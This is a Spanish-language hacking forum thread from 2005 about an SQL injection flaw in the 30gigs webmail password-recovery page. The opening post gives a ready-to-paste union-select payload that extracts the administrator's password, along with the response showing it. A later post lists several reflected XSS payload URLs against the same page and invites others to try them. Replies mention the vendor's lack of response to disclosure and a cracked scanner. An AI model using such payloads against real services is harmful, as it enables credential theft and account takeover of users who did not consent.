elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Ingresar Registrarse
07 Octubre 2008, 16:23  



+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits (Moderadores: sirdarckcat, berz3k)
| | |-+  [OB] 30gigs SQL injection vulnerability
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 Ir Abajo Imprimir
Autor Tema: [OB] 30gigs SQL injection vulnerability  (Leído 5312 veces)
mousehack

Desconectado Desconectado

Mensajes: 1.146

Ex-Colaborador....!!!!!!XD


Ver Perfil
[OB] 30gigs SQL injection vulnerability
« en: 18 Noviembre 2005, 15:52 »

Existe una vulnerabilidad en el servicio de mail de 30gigs que permite el acceso a las contraseñas

Esta vulnerabilidad se encuentra en:

http://www.30gigs.com/getpassword/

debido a que no valida correctamente los datos ingresados por los usuarios.

Prueba de Concepto:
------------------------
ingresamos en http://www.30gigs.com/getpassword/
y pegamos lo siguiente:

Código:
not_existant' union select 1,1,1,1,1,UserPassword,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from users where userLogin='admin

producira un resultado como el siguiente, donde ¨runsit" es la contraseña de la cuenta del administrador:

Código:
We have sent the password for your not_existant' union select 1,1,1,1,1,UserPassword,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from users where userLogin='admin@30gigs.com account to runsit

otras pruebas son admisibles

Fuente:www.addict3d.org

Salu2
« Última modificación: 31 Diciembre 2005, 08:23 por Sirdarckcat » En línea



VISITEN MI BLOG PERSONAL....
http://mousehack.blogspot.com/ ...XD
Cab Calloway
Colaborador

Conectado Conectado

Mensajes: 4.294



Ver Perfil
Re: 30gigs SQL injection vulnerability
« Respuesta #1 en: 18 Noviembre 2005, 17:06 »

Siguen saliendo fallos en 30gigs... a este paso... xD

Saludos!
En línea

Max 400; caracteres restantes: 366
Man-In-the-Middle
www.tunchemart.com --OjO-- Solo Quejas!!
Colaborador

Desconectado Desconectado

Mensajes: 3.322



Ver Perfil WWW
Re: 30gigs SQL injection vulnerability
« Respuesta #2 en: 18 Noviembre 2005, 21:13 »

« Última modificación: 18 Noviembre 2005, 21:30 por Man-In-the-Middle » En línea

krispin

Desconectado Desconectado

Mensajes: 90


Ver Perfil WWW
Re: 30gigs SQL injection vulnerability
« Respuesta #3 en: 18 Noviembre 2005, 21:56 »

Vaya vaya,
esos de 30gigs son una cuadrilla de pencos,
joe,
pa rato me hago una cuenta.
algun dia pararan de salirles fallos increibles?
En línea
mousehack

Desconectado Desconectado

Mensajes: 1.146

Ex-Colaborador....!!!!!!XD


Ver Perfil
Re: 30gigs SQL injection vulnerability
« Respuesta #4 en: 18 Noviembre 2005, 22:00 »

jajajaj usas el mismo scaner que yo...XD, lastima que lo tengo crackeado y no me actualiza la base de datos :-\

Salu2
En línea



VISITEN MI BLOG PERSONAL....
http://mousehack.blogspot.com/ ...XD
Rey11

Desconectado Desconectado

Mensajes: 3.221


¡¡VIVA ESPAÑA!!


Ver Perfil WWW
Re: 30gigs SQL injection vulnerability
« Respuesta #5 en: 18 Noviembre 2005, 22:06 »

Cual es ese escaner??
En línea

Unete a la campaña contra educación para la ciudadanía:
krispin

Desconectado Desconectado

Mensajes: 90


Ver Perfil WWW
Re: 30gigs SQL injection vulnerability
« Respuesta #6 en: 18 Noviembre 2005, 22:25 »

jeje, yo tambien lo he buscado,
pon en la mula acunetix
En línea
ANELKAOS
Moderador Global
*****
Desconectado Desconectado

Mensajes: 2.616



Ver Perfil WWW
Re: 30gigs SQL injection vulnerability
« Respuesta #7 en: 18 Noviembre 2005, 22:25 »

Funciona perfectamente  ;D
En línea

mousehack

Desconectado Desconectado

Mensajes: 1.146

Ex-Colaborador....!!!!!!XD


Ver Perfil
Re: 30gigs SQL injection vulnerability
« Respuesta #8 en: 18 Noviembre 2005, 22:29 »

En línea



VISITEN MI BLOG PERSONAL....
http://mousehack.blogspot.com/ ...XD
mousehack

Desconectado Desconectado

Mensajes: 1.146

Ex-Colaborador....!!!!!!XD


Ver Perfil
Re: 30gigs SQL injection vulnerability
« Respuesta #9 en: 18 Noviembre 2005, 22:58 »

prueben este:

http://www.30gigs.com/getpassword/index.php?login=%3Cscript%3Ealert('mousehack-string-1987708322');%3C/script%3E&submit=Send%20Password&process=1

http://www.30gigs.com/getpassword/index.php?login=%3Cscript%3Ealert('wvs-xss-magic-string-1987708322');%3C/script%3E&submit=Send%20Password&process=1

http://www.30gigs.com/getpassword/index.php?login="><script>alert('mousehack-1859762011');</script>&submit=Send%20Password&process=1

http://www.30gigs.com/getpassword/index.php?login=%3C/textarea%3E%3Cscript%3Ealert('mousehack-71103827');%3C/script%3E&submit=Send%20Password&process=1

http://www.30gigs.com/getpassword/index.php?login=%3Cscript%3Evar%20wvs_xss_test_variable=1060092372;alert(mousehack_variable);%3C/script%3E&submit=Send%20Password&process=1

http://www.30gigs.com/getpassword/index.php?login='&submit=Send%20Password&process=1

no creo que valga la pena reportalo ;) o si?

Salu2
« Última modificación: 18 Noviembre 2005, 23:02 por mousehack » En línea



VISITEN MI BLOG PERSONAL....
http://mousehack.blogspot.com/ ...XD
ANELKAOS
Moderador Global
*****
Desconectado Desconectado

Mensajes: 2.616



Ver Perfil WWW
Re: 30gigs SQL injection vulnerability
« Respuesta #10 en: 18 Noviembre 2005, 23:09 »

En realidad ya les avisaron hace 2 semanas pero los de 30gigs.com no respondieron, a mi Gmail taró un solo dia pero bueno.... hay empresas responsables y otras...no tanto.

Citar
[...]The site has been notified about the vulnerability 2 weeks hago, but no response was taken.
FUENTE Y DESCUBRIDOR: http://seclists.org/lists/fulldisclosure/2005/Nov/0523.html

Nosotros ya lo avisamos!
Citar
[...]Nosotros hemos conseguido llegar al mismo resultado de tres formas distintas, las otras dos bastante mas simples, con lo que fácilmente se deduce que esto es un multibug, y un error de diseño. Con todas estas pistas no tardarán en salir nuevos métodos.
FUENTE: http://www.elhacker.net/gmailbug/
« Última modificación: 18 Noviembre 2005, 23:47 por ANELKAOS » En línea

: : : Sherneyko : : :

Desconectado Desconectado

Mensajes: 194

Solo el eco del silencio mis palabras oira...


Ver Perfil
Re: 30gigs SQL injection vulnerability
« Respuesta #11 en: 19 Noviembre 2005, 14:57 »

con esos bugs es mejor tener una cuenta que reenvie a la nuestra en 30gigs.com  , y no emviar desde 30gigs.com

hace cuanto se descubrio el bug?
En línea

Benedictus Vir Qui Suffert Tentationem Quoninam Quum Probates Fuerit Acipient Coronam Vitae.

Todos tienen un universo dentro de si...y esos universos sumados componen la realidad que pisamos
yagami2k2

Desconectado Desconectado

Mensajes: 271



Ver Perfil
Re: 30gigs SQL injection vulnerability
« Respuesta #12 en: 19 Noviembre 2005, 21:23 »

Así que todas las cuentas corren peligro ... que mal(mmm....suena muy tentador XD)

Suerte que no tengo nada importante en esa cuenta...

Citar
hay empresas responsables y otras...no tanto

Toda la razón, y esta parece que no ha tomado conciencia sobre lo que implica tener un bug como ese.

« Última modificación: 19 Noviembre 2005, 22:45 por yagami2k2 » En línea

We have the power
BenRu
The Prodigy

Desconectado Desconectado

Mensajes: 3.876


Primero la música y luego las palabras...


Ver Perfil
Re: 30gigs SQL injection vulnerability
« Respuesta #13 en: 20 Noviembre 2005, 17:12 »

vaya vaya con esta gente...
Ahora se esta dando mucho esto....

El acunetix ese funciona bien?
En línea
Maximiliano Jose

Desconectado Desconectado

Mensajes: 35


MaxBox


Ver Perfil WWW
Re: 30gigs SQL injection vulnerability
« Respuesta #14 en: 20 Noviembre 2005, 22:16 »

vaya vaya con esta gente...
Ahora se esta dando mucho esto....

El acunetix ese funciona bien?

Al parecer si...
SAludos
En línea

Arrenkemos, ahi viene dios!
Páginas: [1] 2 Ir Arriba Imprimir 
Ir a:  







Consolas     La Web de Goku     MilW0rm     MundoDivx

Hispabyte     Truzone     TodoReviews     ZonaPhotoshop

hard-h2o modding    Foros de ayuda    Yashira.org    Videojuegos    indetectables.net   

Noticias Informatica    Seguridad Informática    ADSL    Foros en español    eNYe Sec

Todas las webs afiliadas están libres de publicidad engañosa.

Powered by SMF 1.1.6 | SMF © 2006-2008, Simple Machines LLC